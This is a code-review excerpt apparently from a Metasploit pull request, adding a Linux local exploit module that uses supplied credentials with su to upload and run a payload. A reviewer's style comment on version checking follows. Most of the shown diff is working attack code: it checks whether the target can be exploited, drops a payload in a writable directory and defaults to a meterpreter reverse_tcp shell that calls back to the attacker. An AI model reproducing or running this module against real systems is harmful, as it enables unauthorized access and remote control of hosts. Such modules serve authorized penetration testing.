modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,179 @@
+          'DisclosureDate' => '1971-11-03',
+          'Platform' => ['linux', 'unix'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [
+            [
+              'Linux x86', {
+                'Arch' => ARCH_X86,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Linux x86_64', {
+                'Arch' => ARCH_X64,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+          'DefaultTarget' => 0,
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+          'SessionTypes' => ['shell', 'meterpreter']
+        )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with.'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  # Main function to run the exploit.
+  def exploit
+    # Check for vulnerable system.
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'target is not vulnerable')
+    end
+
+    fail_with(Failure::NoAccess, 'username not found') unless user_exists(datastore['USERNAME'])
+
+    # Upload the payload and stager files.
+    print_status('Uploading payload to target')
+    payload_file = build_payload(generate_payload_exe, datastore['WritableDir'])
+
+    # Execute the payload.
+    print_status('Attempting to login with su')
+    exec_payload(datastore['USERNAME'], datastore['PASSWORD'], payload_file)
+    register_files_for_cleanup(payload_file)
+  end
+
+  # Function to check if target is exploitable.
+  def check
+    # Make sure su is installed.
+    unless command_exists?('su')
+      vprint_error('su not found on target machine')
+      return CheckCode::Safe
+    end
+
+    # Check for a way to run the exploit.
+    case
+    when command_exists?('python')
+      return CheckCode::Detected
+    when command_exists?('python3')
+      return CheckCode::Detected
+    when command_exists?('script')
+      # Check the dependency commands exits.
+      commands = ['su', 'sleep', 'echo', 'base64']
+      for command in commands
+        unless command_exists?(command)
+          vprint_error("The '#{command}' must be installed on target")
+          return CheckCode::Safe
+        end
+      end
+
+      # Check that the script program is apart of the util-linux package.
+      version = util_linux_verison
+      unless version
+        vprint_error("The 'script' program must be of util-linux")
+        return CheckCode::Safe
+      end
+
+      # Check that util-linux in of a compatible version.
+      version = version.split('.').map(&:to_i)
+      unless version[0] >= 2 && version[1] >= 25
```

Comment:
You can use `Gem::Version` for version comparison. This is cleaner and easier to read.

Note that you will need to `split('-')` the input strings as `Gem::Version` does not deal with `-` nicely.

Reply:
Fixed. See commit 5726db44d068ba5c9d0af783c91d992f3e66bfe5